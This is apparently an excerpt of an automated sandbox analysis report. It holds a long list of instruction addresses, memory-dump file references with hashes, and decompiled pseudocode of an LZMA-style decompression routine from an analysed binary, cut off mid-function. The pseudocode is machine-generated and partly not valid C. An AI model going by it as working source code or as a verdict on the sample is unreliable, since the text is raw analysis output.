                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x00000000
                                                                                                        0x00406854
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x004069b7
                                                                                                        0x004069bd
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x0040676b

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                        • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                        • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                        • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
